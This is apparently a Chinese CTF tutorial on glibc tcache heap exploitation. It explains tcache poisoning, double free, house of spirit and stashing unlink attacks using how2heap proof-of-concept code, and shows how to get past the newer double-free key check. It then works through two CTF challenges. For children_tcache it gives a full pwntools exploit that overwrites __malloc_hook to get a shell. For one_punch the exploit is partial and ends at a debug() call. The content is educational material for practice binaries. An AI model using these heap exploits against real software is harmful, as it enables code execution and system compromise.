tcache attack

Tcache Attack

tcache让堆利用更加简单：

tcache回顾：

在 tcache 中新增了两个结构体，分别是 tcache_entry 和 tcache_perthread_struct：

/* We overlay this structure on the user-data portion of a chunk when the chunk is stored in the per-thread cache.  */
typedef struct tcache_entry
{
  struct tcache_entry *next;
} tcache_entry;

/* There is one of these for each thread, which contains the per-thread cache (hence "tcache_perthread_struct").  Keeping overall size low is mildly important.  Note that COUNTS and ENTRIES are redundant (we could have just counted the linked list each time), this is for performance reasons.  */
typedef struct tcache_perthread_struct
{
  char counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

static __thread tcache_perthread_struct *tcache = NULL;

其中有两个重要的函数， tcache_get() 和 tcache_put():

static void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

static void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}

这两个函数会在函数 _int_free 和 __libc_malloc 的开头被调用，其中 tcache_put 当所请求的分配大小不大于0x408并且当给定大小的 tcache bin 未满时调用。一个 tcache bin 中的最大块数mp_.tcache_count是7。

/* This is another arbitrary limit, which tunables can change.  Each
   tcache bin will hold at most this number of chunks.  */
# define TCACHE_FILL_COUNT 7
#endif

再复习一遍 tcache_get() 的源码：

static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}

在 tcache_get 中，仅仅检查了 tc_idx ，此外，我们可以将 tcache 当作一个类似于 fastbin 的单独链表，只是它的 check，并没有 fastbin 那么复杂，仅仅检查 tcache->entries[tc_idx] = e->next;

tcache的使用：

内存释放：

可以看到，在 free 函数的最先处理部分，首先是检查释放块是否页对齐及前后堆块的释放情况，便优先放入 tcache 结构中。

_int_free (mstate av, mchunkptr p, int have_lock)
{
  INTERNAL_SIZE_T size;        /* its size */
  mfastbinptr *fb;             /* associated fastbin */
  mchunkptr nextchunk;         /* next contiguous chunk */
  INTERNAL_SIZE_T nextsize;    /* its size */
  int nextinuse;               /* true if nextchunk is used */
  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
  mchunkptr bck;               /* misc temp for linking */
  mchunkptr fwd;               /* misc temp for linking */

  size = chunksize (p);

  /* Little security check which won't hurt performance: the
     allocator never wrapps around at the end of the address space.
     Therefore we can exclude some size values which might appear
     here by accident or by "design" from some intruder.  */
  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
      || __builtin_expect (misaligned_chunk (p), 0))
    malloc_printerr ("free(): invalid pointer");
  /* We know that each chunk is at least MINSIZE bytes in size or a
     multiple of MALLOC_ALIGNMENT.  */
  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
    malloc_printerr ("free(): invalid size");

  check_inuse_chunk(av, p);

#if USE_TCACHE
  {
    size_t tc_idx = csize2tidx (size);

    if (tcache
      && tc_idx < mp_.tcache_bins
      && tcache->counts[tc_idx] < mp_.tcache_count)
      {
        tcache_put (p, tc_idx);
        return;
      }
  }
#endif

......
}

内存申请：

在内存分配的 malloc 函数中有多处，会将内存块移入 tcache 中。

首先，申请的内存块符合 fastbin 大小时并且在 fastbin 内找到可用的空闲块时，会把该 fastbin 链上的其他内存块放入 tcache 中。
其次，申请的内存块符合 smallbin 大小时并且在 smallbin 内找到可用的空闲块时，会把该 smallbin 链上的其他内存块放入 tcache 中。
当在 unsorted bin 链上循环处理时，当找到大小合适的链时，并不直接返回，而是先放到 tcache 中，继续处理。

fastbin 的时候：

  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
    {
      idx = fastbin_index (nb);
      mfastbinptr *fb = &fastbin (av, idx);
      mchunkptr pp;
      victim = *fb;

      if (victim != NULL)
    {
      if (SINGLE_THREAD_P)
        *fb = victim->fd;
      else
        REMOVE_FB (fb, pp, victim);
      if (__glibc_likely (victim != NULL))
        {
          size_t victim_idx = fastbin_index (chunksize (victim));
          if (__builtin_expect (victim_idx != idx, 0))
              malloc_printerr ("malloc(): memory corruption (fast)");
          check_remalloced_chunk (av, victim, nb);
#if USE_TCACHE
          /* While we're here, if we see other chunks of the same size,
         stash them in the tcache.  */
          size_t tc_idx = csize2tidx (nb);
          if (tcache && tc_idx < mp_.tcache_bins)
        {
          mchunkptr tc_victim;

          /* While bin not empty and tcache not full, copy chunks.  */
          while (tcache->counts[tc_idx] < mp_.tcache_count
            && (tc_victim = *fb) != NULL)
            {
              if (SINGLE_THREAD_P)
               *fb = tc_victim->fd;
              else
              {
                REMOVE_FB (fb, pp, tc_victim);
                if (__glibc_unlikely (tc_victim == NULL))
                  break;
              }
              tcache_put (tc_victim, tc_idx);
            }
        }
#endif
          void *p = chunk2mem (victim);
          alloc_perturb (p, bytes);
          return p;
        }
    }
    }

tcache 取出：在内存申请的开始部分，首先会判断申请大小块，在 tcache 是否存在，如果存在就直接从 tcache 中摘取，否则再使用_int_malloc 分配。
在循环处理 unsorted bin 内存块时，如果达到放入 unsorted bin 块最大数量，会立即返回。默认是 0，即不存在上限。

#if USE_TCACHE
      /* If we've processed as many chunks as we're allowed while
   filling the cache, return one of the cached ones.  */
      ++tcache_unsorted_count;
      if (return_cached
        && mp_.tcache_unsorted_limit > 0
        && tcache_unsorted_count > mp_.tcache_unsorted_limit)
      {
        return tcache_get (tc_idx);
      }
#endif

在循环处理 unsorted bin 内存块后，如果之前曾放入过 tcache 块，则会取出一个并返回。

#if USE_TCACHE
      /* If all the small chunks we found ended up cached, return one now.  */
      if (return_cached)
      {
        return tcache_get (tc_idx);
      }
#endif

tcache利用

1. tcache poisoning

通过覆盖 tcache 中的 next，不需要伪造任何 chunk 结构即可实现 malloc 到任何地址。

以 how2heap 中的 tcache_poisoning 为例：

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <assert.h>

int main()
{
	// disable buffering
	setbuf(stdin, NULL);
	setbuf(stdout, NULL);

	printf("This file demonstrates a simple tcache poisoning attack by tricking malloc into\n"
		   "returning a pointer to an arbitrary location (in this case, the stack).\n"
		   "The attack is very similar to fastbin corruption attack.\n");
	printf("After the patch https://sourceware.org/git/?p=glibc.git;a=commit;h=77dc0d8643aa99c92bf671352b0a8adde705896f,\n"
		   "We have to create and free one more chunk for padding before fd pointer hijacking.\n\n");

	size_t stack_var;
	printf("The address we want malloc() to return is %p.\n", (char *)&stack_var);

	printf("Allocating 2 buffers.\n");
	intptr_t *a = malloc(128);
	printf("malloc(128): %p\n", a);
	intptr_t *b = malloc(128);
	printf("malloc(128): %p\n", b);

	printf("Freeing the buffers...\n");
	free(a);
	free(b);

	printf("Now the tcache list has [ %p -> %p ].\n", b, a);
	printf("We overwrite the first %lu bytes (fd/next pointer) of the data at %p\n"
		   "to point to the location to control (%p).\n", sizeof(intptr_t), b, &stack_var);
	b[0] = (intptr_t)&stack_var;
	printf("Now the tcache list has [ %p -> %p ].\n", b, &stack_var);

	printf("1st malloc(128): %p\n", malloc(128));
	printf("Now the tcache list has [ %p ].\n", &stack_var);

	intptr_t *c = malloc(128);
	printf("2nd malloc(128): %p\n", c);
	printf("We got the control\n");

	assert((long)&stack_var == (long)c);
	return 0;
}

运行结果是：

分析一下，程序先申请了一个大小是 128 的 chunk，然后 free。128 在 tcache 的范围内，因此 free 之后该 chunk 被放到了 tcache 中，调试如下：

可以看到，此时第 8 条 tcache 链上已经有了两个 chunk，从 tcache_perthread_struct 结构体中也能得到同样的结论。

然后修改 tcache 的 next：

此时，第 8 条 tcache 链的 next 已经被改成栈上的地址了。接下来类似 fastbin attack，只需进行两次 malloc(128) 即可控制栈上的空间：

第一次 malloc：

第二次 malloc，即可 malloc 栈上的地址了：

在这里插入图片描述

可以看出 tcache posioning 这种方法和 fastbin attack 类似，但因为没有 size 的限制 （不用再伪造size字段了，直接修改头节点的next指针 即可，前提是bin的数量足够==>count不为0）有了更大的利用范围。

2. tcache dup （double free）

类似 fastbin dup，不过利用的是 tcache_put() 的不严谨：

static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

可以看出，tcache_put() 的检查也可以忽略不计（甚至没有对 tcache->counts[tc_idx] 的检查），大幅提高性能的同时安全性也下降了很多。

因为没有任何检查，所以我们可以对同一个 chunk 多次 free，造成 cycliced list。

以 how2heap 的 tcache_dup 为例分析，源码如下：

#include <stdio.h>
#include <stdlib.h>

int main()
{
    fprintf(stderr, "This file demonstrates a simple double-free attack withtcache.\n");
    fprintf(stderr, "Allocating buffer.\n");
    int *a = malloc(8);
    fprintf(stderr, "malloc(8): %p\n", a);
    fprintf(stderr, "Freeing twice...\n");
    free(a);
    free(a);
    fprintf(stderr, "Now the free list has [ %p, %p ].\n", a, a);
    fprintf(stderr, "Next allocated buffers will be same: [ %p, %p ].\n", malloc(8), malloc(8));
    return 0;
}

调试一下，第一次 free，tcache 的第一条链放入了一个 chunk：

第二次 free 时，虽然 free 的是同一个 chunk，但因为 tcache_put() 没有做任何检查，因此程序不会 crash，可以看出，这种方法与 fastbin dup 相比也简单了很多（fastbin在free时有头部检查，不能两次释放同一个）：

3. tcache perthread corruption

我们已经知道 tcache_perthread_struct 是整个 tcache 的管理结构，如果能控制这个结构体，那么无论我们 malloc 的 size 是多少，地址都是可控的。

例子，申请到tcache_perthread_struct作为chunk，然后修改其中的值，实现任意大小、任意地址的chunk分配：

地址：[CISCN 2021 初赛]lonelywolf | NSSCTF

题解：[NSSCTF堆][tcache]-CSDN博客

4. tcache house of spirit

拿 how2heap 的源码来讲：

#include <stdio.h>
#include <stdlib.h>

int main()
{
    fprintf(stderr, "This file demonstrates the house of spirit attack on tcache.\n");
    fprintf(stderr, "It works in a similar way to original house of spirit but you don't need to create fake chunk after the fake chunk that will be freed.\n");
    fprintf(stderr, "You can see this in malloc.c in function _int_free that tcache_put is called without checking if next chunk's size and prev_inuse are sane.\n");
    fprintf(stderr, "(Search for strings \"invalid next size\" and \"double free or corruption\")\n\n");

    fprintf(stderr, "Ok. Let's start with the example!.\n\n");


    fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");
    malloc(1);

    fprintf(stderr, "Let's imagine we will overwrite 1 pointer to point to a fake chunk region.\n");
    unsigned long long *a; //pointer that will be overwritten
    unsigned long long fake_chunks[10]; //fake chunk region

    fprintf(stderr, "This region contains one fake chunk. It's size field is placed at %p\n", &fake_chunks[1]);

    fprintf(stderr, "This chunk size has to be falling into the tcache category (chunk.size <= 0x410; malloc arg <= 0x408 on x64). The PREV_INUSE (lsb) bit is ignored by free for tcache chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
    fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
    fake_chunks[1] = 0x40; // this is the size


    fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
    fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");

    a = &fake_chunks[2];

    fprintf(stderr, "Freeing the overwritten pointer.\n");
    free(a);

    fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
    fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30));
}

运行结果：

攻击之后的目的是，去控制栈上的内容。malloc 一块 chunk ，然后我们通过在栈上 fake 的 chunk，然后去 free 掉他，我们会发现，tcache中会出现栈上fake_chunk存放next指针的地址：

在这里插入图片描述

通过一次malloc就能申请到该fake_chunk，从而控制栈上的数据。

5. smallbin unlink

在 small bin 中包含有空闲块的时候，会同时将同大小的其他空闲块，放入 tcache 中，此时也会出现解链操作 unlink ，但相比于 unlink 宏，缺少了链完整性校验。因此，原本 unlink 操作在该条件下也可以使用。

6. tcache stashing unlink attack

这种攻击利用的是 tcache bin 有剩余 (数量小于 TCACHE_MAX_BINS ) 时，同大小的 small bin 会放进 tcache 中 (这种情况可以用 calloc 分配同大小堆块触发，因为 calloc 分配堆块时不从 tcache bin 中选取)。在获取到一个 smallbin 中的一个 chunk 后，如果 tcache 仍有足够空闲位置，会将剩余的 small bin 链入 tcache ，在这个过程中只对第一个 bin 进行了完整性检查，后面的堆块的检查缺失。当攻击者可以写一个 small bin 的 bk 指针时，其可以在任意地址上写一个 libc 地址 (类似 unsorted bin attack 的效果)。构造得当的情况下也可以分配 fake chunk 到任意地址。

这里以 how2heap 中的 tcache_stashing_unlink_attack.c 为例：

我们按照释放的先后顺序称 smallbin[sz] 中的两个 chunk 分别为 chunk0 和 chunk1。我们修改 chunk1 的 bk 为 fake_chunk_addr。同时还要在 fake_chunk_addr->bk 处提前写一个可写地址 writable_addr 。调用 calloc(size-0x10) 的时候会返回给用户 chunk0 (这是因为 smallbin 的 FIFO 分配机制)，假设 tcache[sz] 中有 5 个空闲堆块，则有足够的位置容纳 chunk1 以及 fake_chunk 。在源码的检查中，只对第一个 chunk 的链表完整性做了检测 __glibc_unlikely (bck->fd != victim) ，后续堆块在放入过程中并没有检测。

因为 tcache 的分配机制是 LIFO ，所以位于 fake_chunk->bk 指针处的 fake_chunk 在链入 tcache 的时候反而会放到链表表头。在下一次调用 malloc(sz-0x10) 时会返回 fake_chunk+0x10 给用户，同时，由于 bin->bk = bck;bck->fd = bin; 的 unlink 操作，会使得 writable_addr+0x10 处被写入一个 libc 地址：

#include <stdio.h>
#include <stdlib.h>

int main(){
    unsigned long stack_var[0x10] = {0};
    unsigned long *chunk_lis[0x10] = {0};
    unsigned long *target;

    fprintf(stderr, "This file demonstrates the stashing unlink attack on tcache.\n\n");
    fprintf(stderr, "This poc has been tested on both glibc 2.27 and glibc 2.29.\n\n");
    fprintf(stderr, "This technique can be used when you are able to overwrite the victim->bk pointer. Besides, it's necessary to alloc a chunk with calloc at least once. Last not least, we need a writable address to bypass check in glibc\n\n");
    fprintf(stderr, "The mechanism of putting smallbin into tcache in glibc gives us a chance to launch the attack.\n\n");
    fprintf(stderr, "This technique allows us to write a libc addr to wherever we want and create a fake chunk wherever we need. In this case we'll create the chunk on the stack.\n\n");

    // stack_var emulate the fake_chunk we want to alloc to
    fprintf(stderr, "Stack_var emulates the fake chunk we want to alloc to.\n\n");
    fprintf(stderr, "First let's write a writeable address to fake_chunk->bk to bypass bck->fd = bin in glibc. Here we choose the address of stack_var[2] as the fake bk. Later we can see *(fake_chunk->bk + 0x10) which is stack_var[4] will be a libc addr after attack.\n\n");

    stack_var[3] = (unsigned long)(&stack_var[2]);

    fprintf(stderr, "You can see the value of fake_chunk->bk is:%p\n\n",(void*)stack_var[3]);
    fprintf(stderr, "Also, let's see the initial value of stack_var[4]:%p\n\n",(void*)stack_var[4]);
    fprintf(stderr, "Now we alloc 9 chunks with malloc.\n\n");

    //now we malloc 9 chunks
    for(int i = 0;i < 9;i++){
        chunk_lis[i] = (unsigned long*)malloc(0x90);
    }

    //put 7 tcache
    fprintf(stderr, "Then we free 7 of them in order to put them into tcache. Carefully we didn't free a serial of chunks like chunk2 to chunk9, because an unsorted bin next to another will be merged into one after another malloc.\n\n");

    for(int i = 3;i < 9;i++){
        free(chunk_lis[i]);
    }

    fprintf(stderr, "As you can see, chunk1 & [chunk3,chunk8] are put into tcache bins while chunk0 and chunk2 will be put into unsorted bin.\n\n");

    //last tcache bin
    free(chunk_lis[1]);
    //now they are put into unsorted bin
    free(chunk_lis[0]);
    free(chunk_lis[2]);

    //convert into small bin
    fprintf(stderr, "Now we alloc a chunk larger than 0x90 to put chunk0 and chunk2 into small bin.\n\n");

    malloc(0xa0);//>0x90

    //now 5 tcache bins
    fprintf(stderr, "Then we malloc two chunks to spare space for small bins. After that, we now have 5 tcache bins and 2 small bins\n\n");

    malloc(0x90);
    malloc(0x90);

    fprintf(stderr, "Now we emulate a vulnerability that can overwrite the victim->bk pointer into fake_chunk addr: %p.\n\n",(void*)stack_var);

    //change victim->bck
    /*VULNERABILITY*/
    chunk_lis[2][1] = (unsigned long)stack_var;
    /*VULNERABILITY*/

    //trigger the attack
    fprintf(stderr, "Finally we alloc a 0x90 chunk with calloc to trigger the attack. The small bin preiously freed will be returned to user, the other one and the fake_chunk were linked into tcache bins.\n\n");

    calloc(1,0x90);

    fprintf(stderr, "Now our fake chunk has been put into tcache bin[0xa0] list. Its fd pointer now point to next free chunk: %p and the bck->fd has been changed into a libc addr: %p\n\n",(void*)stack_var[2],(void*)stack_var[4]);

    //malloc and return our fake chunk on stack
    target = malloc(0x90);   

    fprintf(stderr, "As you can see, next malloc(0x90) will return the region our fake chunk: %p\n",(void*)target);
    return 0;
}

这个 poc 用栈上的一个数组上模拟 fake_chunk 。首先构造出 5 个 tcache chunk 和 2 个 smallbin chunk 的情况。模拟 UAF 漏洞修改 bin2->bk 为 fake_chunk ，在 calloc(0x90) 的时候触发攻击。

我们在 calloc 处下断点，调用前查看堆块排布情况。此时 tcache[0xa0] 中有 5 个空闲块。可以看到 chunk1->bk 已经被改为了 fake_chunk_addr 。而 fake_chunk->bk 也写上了一个可写地址。由于 smallbin 是按照 bk 指针寻块的，分配得到的顺序应当是 0x55555555b250->0x55555555b390->0x7fffffffdde0 (FIFO) 。调用 calloc 会返回给用户 0x55555555b250+0x10。

在这里插入图片描述

调用 calloc 后再查看堆块排布情况，可以看到 fake_chunk 已经被链入 tcache_entry[8] , 且因为分配顺序变成了 LIFO , 0x7fffffffdde0-0x10 这个块被提到了链表头，下次 malloc(0x90) 即可获得这个块：

其 fd 指向下一个空闲块，在 unlink 过程中 bck->fd = bin 的赋值操作使得 0x7fffffffdde0+0x10 处写入了一个 libc 地址 （与unsortedbin attack写入一个较大的地址一样）。

7. libc leak

在以前的 libc 版本中，我们只需这样：

#include <stdlib.h>
#include <stdio.h>

int main()
{
    long *a = malloc(0x1000);
    malloc(0x10);		//防止于top chunk合并
    free(a);
    printf("%p\n",a[0]);
}

但是在 2.26 之后的 libc 版本后，我们首先得先把 tcache 填满：

#include <stdlib.h>
#include <stdio.h>

int main(int argc , char* argv[])
{
    long* t[7];
    long *a=malloc(0x100);
    long *b=malloc(0x10);		//防止于top chunk合并

    // make tcache bin full
    for(int i=0;i<7;i++)
        t[i]=malloc(0x100);
    for(int i=0;i<7;i++)
        free(t[i]);

    free(a);
    // a is put in an unsorted bin because the tcache bin of this size is full
    printf("%p\n",a[0]);
}

Tcache Check

在最新的 libc 的 commit 中更新了 Tcache 的 double free 的 check：

index 6d7a6a8..f730d7a 100644 (file)
--- a/malloc/malloc.c
+++ b/malloc/malloc.c
@@ -2967,6 +2967,8 @@ mremap_chunk (mchunkptr p, size_t new_size)
 typedef struct tcache_entry
 {
   struct tcache_entry *next;
+  /* This field exists to detect double frees.  */
+  struct tcache_perthread_struct *key;
 } tcache_entry;

 /* There is one of these for each thread, which contains the
@@ -2990,6 +2992,11 @@ tcache_put (mchunkptr chunk, size_t tc_idx)
 {
   tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
   assert (tc_idx < TCACHE_MAX_BINS);
+
+  /* Mark this chunk as "in the tcache" so the test in _int_free will
+     detect a double free.  */
+  e->key = tcache;
+
   e->next = tcache->entries[tc_idx];
   tcache->entries[tc_idx] = e;
   ++(tcache->counts[tc_idx]);
@@ -3005,6 +3012,7 @@ tcache_get (size_t tc_idx)
   assert (tcache->entries[tc_idx] > 0);
   tcache->entries[tc_idx] = e->next;
   --(tcache->counts[tc_idx]);
+  e->key = NULL;
   return (void *) e;
 }

@@ -4218,6 +4226,26 @@ _int_free (mstate av, mchunkptr p, int have_lock)
   {
     size_t tc_idx = csize2tidx (size);

+    /* Check to see if it's already in the tcache.  */
+    tcache_entry *e = (tcache_entry *) chunk2mem (p);
+
+    /* This test succeeds on double free.  However, we don't 100%
+       trust it (it also matches random payload data at a 1 in
+       2^<size_t> chance), so verify it's not an unlikely coincidence
+       before aborting.  */
+    if (__glibc_unlikely (e->key == tcache && tcache)) //通过key找到tcache的地址，进行比较
+      {
+       tcache_entry *tmp;
+       LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
+       for (tmp = tcache->entries[tc_idx];
+            tmp;
+            tmp = tmp->next)
+         if (tmp == e)
+           malloc_printerr ("free(): double free detected in tcache 2");
+       /* If we get here, it was a coincidence.  We've wasted a few
+          cycles, but don't abort.  */
+      }
+
     if (tcache
        && tc_idx < mp_.tcache_bins
        && tcache->counts[tc_idx] < mp_.tcache_count)

通过key找到tcache的地址，进行比较：key值check，如果要绕过可以在free后将key值清0，再释放同一个块，就能绕过检查：

例题1：children_tcache

题目地址：children_tcache

思路：

利用off_by_one创造unlink从而free向后合并，实现chunk之间的重叠，从而泄漏main_arena中的地址。
利用tcache dup实现任意地址分配chunk，进而实现任意地址写数据 ==> 用one_gadget覆盖malloc_hook，从而getshell。

分析：

只有添加、显示、删除三个函数，add函数，其中的read函数存在off_by_null漏洞，会在输入的字符串最后加上00：
delete函数，清空堆指针，没有UAF漏洞，并且chunk在free后会根据申请的大小填充满0xda（在利用off_by_null构造unlink时prev_size中的0xda要消去）：
show函数，结合delete用函数，同样不存在UAF，会输出堆指针指向的内容：

利用：

因为存在tcache，并且在tcache中的chunk时不能合并的（unlink），所以要申请大于0x410的chunk，释放后才能进入unsortedbin。申请一个0x410的chunk和一个0x500的chunk，用来实现unlink，另外在两个chunk中间申请一个0x10的chunk，来创造unlink，并最后输出泄漏的main_arena中的地址：
```
add(0x410,'s')	#0 实现unlink
add(0x18,'k')	#1 创建unlink
add(0x4f0,'y')	#2 触发unlink
add(0x20,'e')	#3 防止合并
```

利用chunk1创建unlink：清空chunk2的prev_inuse位，在prev_size位伪造大小：

free(0) #为unlink做准备

#清空chunk2的prev_inuse位，并伪造prev_size位，利用循环将prev_size位中的高位清空
free(1)
for i in range(0,9):
    add(0x18-i,b"a"*(0x18-i))   #0
    free(0)

payload0 = b"a"*0x10+p64(0x420+0x20)
add(0x18,payload0)  #申请一个与chunk0同样大小的堆，将合并后的chunk0中的main_arena地址推到chunk1中输出

# 泄漏libc地址
free(2)
add(0x410,b"libc leak") #1
show(0)

p.recv()
addr = u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))
success("main_arena_unsortbin_addr==>"+hex(addr))
main_arena_offset = libc.symbols["__malloc_hook"]+0x10
success("main_arena_offset==>"+hex(main_arena_offset))
libc_base = addr-(main_arena_offset+0x60)
success("libc_addr==>"+hex(libc_base))
malloc_hook_addr = libc.symbols["__malloc_hook"] + libc_base
success("malloc_hook_addr==>"+hex(malloc_hook_addr))

再申请一个size为0x20的chunk，其会与chunk1重叠，再释放掉这两个chunk,就实现了tcache dup：

#tcache dup
add(0x18,b"tcache dup") #2
free(0)
free(2)
add(0x18,p64(malloc_hook_addr)) #0 将next指针改为malloc_hook地址，再次申请就能申请到该地址

add(0x18,b"d")  #2 申请到malloc_hook作为cunk

修改next指针：

最后像malloc_hook中写入onegadget地址：

exeve_addr = one_gadget[2]+libc_base
success("exeve_addr==>"+hex(exeve_addr))
payload = p64(exeve_addr)
add(0x18,payload)
add(0x18,b"get shell")
p.sendline(b"cat flag")
p.interactive()

完整的EXP：

from pwn import *
from LibcSearcher import *
context(os='linux', arch='amd64', log_level='debug')

def debug():
    print(proc.pidof(p))
    pause()

# p = remote("node5.buuoj.cn",28220)
p = process("./pwn")
libc = ELF('./libc-2.27.so')
elf = ELF("./pwn")

def add(size,content):
    p.sendline(b'1')
    p.sendline(str(size).encode())
    p.sendline(content)

def show(index):
    p.sendline(b'2')
    p.sendlineafter(b':',str(index).encode())

def free(index):
    p.sendline(b'3')
    p.sendline(str(index).encode())

one_gadget = [0x4f2be,0x4f2c5,0x4f322,0x10a38c]

add(0x410,b"a") #0
add(0x18,b"a")  #1
add(0x4f0,b"a") #2
add(0x20,b'a')  #3

free(0) #为unlink做准备

#清空chunk2的prev_inuse位，并伪造prev_size位，利用循环将prev_size位中的高位清空
free(1)
for i in range(0,9):
    add(0x18-i,b"a"*(0x18-i))   #0
    free(0)
    print("count",i)

payload0 = b"a"*0x10+p64(0x420+0x20)
add(0x18,payload0)  #0

# 泄漏libc地址
free(2)
add(0x410,b"libc leak") #1
show(0)

p.recv()
addr = u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))
success("main_arena_unsortbin_addr==>"+hex(addr))
main_arena_offset = libc.symbols["__malloc_hook"]+0x10
success("main_arena_offset==>"+hex(main_arena_offset))
libc_base = addr-(main_arena_offset+0x60)
success("libc_addr==>"+hex(libc_base))
malloc_hook_addr = libc.symbols["__malloc_hook"] + libc_base
success("malloc_hook_addr==>"+hex(malloc_hook_addr))

#tcache dup
add(0x18,b"tcache dup") #2
free(0)
free(2)

add(0x18,p64(malloc_hook_addr)) #0

add(0x18,b"d")  #2
exeve_addr = one_gadget[2]+libc_base
success("exeve_addr==>"+hex(exeve_addr))
payload = p64(exeve_addr)
add(0x18,payload)
add(0x18,b"get shell")

p.sendline(b"cat flag")
p.interactive()

拿到flag：

例题2：hitcon_ctf_2019_one_punch

题目地址：hitcon_ctf_2019_one_punch

[!IMPORTANT]

在2.29及以后得版本中对 unsordea bin的进行了双向链表检查,故unsortec bin attack就不可以再用了,不过 tcache stashing unlink attack 可以达到同样的效果

原理:就是我们从 smallbin中取出 chunk时，会检如果当前大小的 smallbin中还有 bin，并且 tcache bin中还有空余的位置 （数量没堆满7个）就会把剩余 chunk 链入到 tcache bin中（可以通过calloc实现，calloc不会从tcache中拿chunk），在链入的过程只对第一个bin进行双向链表检查，后续bin缺少完整性检查（还是因为没有进行双向链表检查造成的，跟unsorted bin attack差不多就是触发前提有所不同)

从上面可以看出首先需要 Etcache从（smallbin中链入一个 chunk，这个怎么做？如何跳过 tcache bin从 smallbin取 chunk?

使用 calloc(它不会从 tcache bin里取堆块)

适用版本：目前适用于所有带tcache的glibc版本（2.26—2.36）利用条件

1、能使用calloc分配堆块 （在tcache没满时，跳过tcache从smallbin中拿chunk）

2、有溢出或uaf （修改small bin中的bk指针）

思路：

利用tcache stashing unlink attack，将tcache中size为0x220的bin的数量改大 （至少是8才行），从而绕过后门函数的if检查，且保证能申请两次。（原因是要想实现任意地址分配chunk，就要利用malloc函数从伪造的tcache申请，但是要利用malloc函数必须绕过检查，检查是tcache中0x220bin的数量要大于6，也就是说tcache中0x220bin的数量必须保持在7以上，但是count的上线是7，修改掉next指针后完全 不够申请两次 ）。
修改tcache中size为0x220的bin的next指针，指向malloc_hook的地址处。
利用后门函数中的malloc申请到malloc_hook处的chunk，最后ORW获取flag。

分析：

主要看delete函数，堆指针未清0 ，存在UAF漏洞，利用该漏洞来实现tcache stashing unlink attack：
add函数，index只能为0、1、2，其次写入的数据先往栈上写，再copy到堆上（利用这个漏洞往栈上写ROP，然后malloc_hook执行ROP）：

利用：

先填满tcache获取堆的基地址，和libc基地址：

for i in range(0,7):
    add(0,b"a"*0x87)
    free(0)
show(0)
# 获取堆的基地址
p.recvuntil(b"hero name: ")
heap_base = u64(p.recv(6).ljust(8,b"\x00"))&0xfffffffff000
success("heap_base==>"+hex(heap_base))

add(0,b"a"*0x87)
add(1,b"flag"+b"\x00"*(0x87-4))
free(0)
show(0)
#泄漏main_arena中的地址
p.recv()
addr = u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))
success("main_arena_unsortbin_addr==>"+hex(addr))
main_arena_offset = libc.symbols["__malloc_hook"]+0x10
success("main_arena_offset==>"+hex(main_arena_offset))
libc_base = addr-(main_arena_offset+0x60)
success("libc_addr==>"+hex(libc_base))
 
#计算__free_hook和system地址
malloc_hook_addr = libc_base+libc.sym["__malloc_hook"]
success("malloc_hook_addr==>"+hex(malloc_hook_addr))
system_addr = libc_base+libc.sym["system"]
free_hook_addr = libc_base+libc.sym["__free_hook"]
success("system_addr==>"+hex(system_addr))
success("free_hook_addr==>"+hex(free_hook_addr))

利用tcache stashing unlink attack，修改tcahe中0x220bin的数量：

add(0,b"a"*0x217)
for i in range(2):
    free(0)
    edit(0,p64(0)*2)
edit(0,p64(malloc_hook_addr))
#进行tcache stashing unlink attack

add(0,b"a"*0xf0)
for i in range(6):  #留一个空间进行
    free(0)
    edit(0,p64(0)*2)

# 构造small bin
add(0,b"a"*0x400)
for i in range(7):
    free(0)
    edit(0,p64(0)*2)
# 生成两个0x100的smallbin
add(0,b"a"*0x400)   #smallbin1 0x100
add(1,b"a"*0x400)
free(0)
add(0,b"a"*0x300)
add(1,b"a"*0x300)  

add(1,b"a"*0x400)   #smallbin2 0x100
add(2,b"a"*0x400)
free(1)
add(2,b"a"*0x300)
add(2,b"a"*0x300)   

#修改fd、bk指针
fd = heap_base+0x11a0	#保证第一个smallbin的检查，与unlink检查一样
bk = heap_base+0x20-5
payload1 = b"A"*0x300 + p64(0) + p64(0x101) + p64(fd) + p64(bk)
edit(1,payload1)

add(0,b"a"*0xf0)
debug()

